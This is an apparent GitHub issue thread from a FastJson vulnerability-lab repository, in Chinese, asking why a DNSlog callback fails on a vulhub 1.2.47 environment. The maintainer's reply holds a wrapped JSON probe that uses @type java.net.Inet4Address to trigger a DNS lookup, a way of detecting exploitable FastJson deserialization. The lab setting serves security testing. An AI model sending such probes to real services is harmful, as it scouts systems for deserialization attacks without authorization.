为什么vulhub的1.2.47，传json接收不到dnslog请求

lemono0 / FastJsonParty

FastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本)，主要包括JNDI注入及高版本绕过、waf绕过、文件读写、原生反序列化、利用链探测绕过、不出网利用等。从黑盒的角度覆盖FastJson深入利用

860 stars 99 forks source link

Closed lishixin7777 closed 4 months ago

lishixin7777 commented 4 months ago

lemono0 commented 4 months ago

有些代码里面限制了传输的格式是一个正常的对象，所以测试时最好都通过正常的格式将payload包裹 { "a":{ "@type":"java.net.Inet4Address", "val":"dnslog" } }